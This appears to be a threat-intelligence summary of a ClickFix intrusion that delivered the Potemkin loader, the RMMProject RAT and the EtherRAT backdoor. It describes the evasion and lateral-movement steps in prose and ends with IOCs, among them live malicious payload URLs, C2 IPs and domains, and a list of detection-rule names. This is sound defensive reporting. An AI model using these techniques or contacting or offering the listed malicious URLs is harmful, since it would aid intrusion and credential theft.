Potemkin Loader ClickFix Intrusion: Multi-Stage Campaign Deploying RMMProject RAT and Blockchain-Resolved Backdoor
Source report →In a confirmed hands-on intrusion spanning eleven endpoints, attackers gained initial access through a ClickFix lure served from a compromised website that directed victims to paste a command into the Windows Run dialog. The command abuses pcalua.exe as a LOLBIN to spawn mshta.exe with a remote HTA URL, which silently downloads and executes an MSI installer delivering the Potemkin loader. Potemkin is a compact custom loader that uses a deterministic domain generation algorithm built on XorShift32 to probe ten thousand candidate domains for active C2, reflectively loading its follow-on payload directly in memory once contact is made. The use of a shared DGA codebase between Potemkin and its second stage, RMMProject, suggests a single development team behind the campaign.
RMMProject is a modular RAT framework embedding a LuaJIT scripting engine that gives the operator dynamic execution capability without recompiling the implant. Its capabilities cover browser credential and cookie theft across Chrome, Firefox, and Edge, an App-Bound Encryption bypass that injects a helper DLL into a spawned Chrome process to decrypt stored secrets from Chrome version 127 and later, remote desktop control on a hidden Windows desktop, process injection, and reflective module loading. Following RMMProject deployment, a second installer delivers EtherRAT: a Node.js-based backdoor that resolves its C2 server address by reading a value from an Ethereum smart contract, making the C2 channel resilient to domain takedowns since updates require only a low-cost blockchain transaction. A renamed Cloudflare tunnel binary provides an additional persistent inbound access channel.
What distinguishes this intrusion is the visible adaptability of the human operator once inside. Rather than running a fixed playbook, the attacker cycled through a progression of defense evasion techniques in response to Defender detections: beginning with disabling Windows' built-in script scanning interface (AMSI) via .NET reflection, escalating to registry policy writes that stripped real-time protection, then adding exclusion paths via PowerShell, and ultimately terminating the Windows Defender service entirely when earlier attempts were blocked. This back-and-forth against endpoint defenses played out while the attacker simultaneously deployed a Chisel reverse proxy for network pivoting and spread the loader across eleven hosts using Impacket-style remote execution, compromising domain administrator credentials and reaching the domain controller. The attacker likely had hours of unobserved access on at least one endpoint before any telemetry existed, underscoring the risk of gaps in endpoint monitoring coverage.
IOCs (19)
Scan your environment for IOCs →SHA256 FILE HASH 5
2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881cecd4e5e2c65b1660470d3446539ee68adf5faeece3eaeb46583623be9911ee1452ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3aIP ADDRESS 2
77.110.122.58213.165.41.26DOMAIN 5
cl.distritovagas.comsonra.eutialyson.comanus-staylard.xyzpestrear-lamp.xyzresumeacceptable.comURL 2
https://cl.distritovagas.com/hte.htahttps://sonra.eutialyson.com/inst24.msiFILE NAME 5
inst24.msicons_1.0.1.msihyper-v.verek_kill_av.ps1ek_disable_av.ps1Detections (10)
Enable detections →Connect your environment for suggestions and queries personalized to your security telemetry.
- ClickFix-RunMRU-Registry-Write-with-Suspicious-Command
- ConHost Headless Spawning Node Process
- WinDefend Service Termination via PowerShell
- Windows Defender Protection Disabled via PowerShell or Registry
- Scheduled Task Registering Binary from User-Writable Path
- Non-Browser Process Connecting to Ethereum RPC
- PUA - Chisel Tunneling Tool Execution
- Detect reflective DLL injection or in-memory assembly loading without disk writes
- Detect encoded PowerShell, download cradles, and AMSI bypasses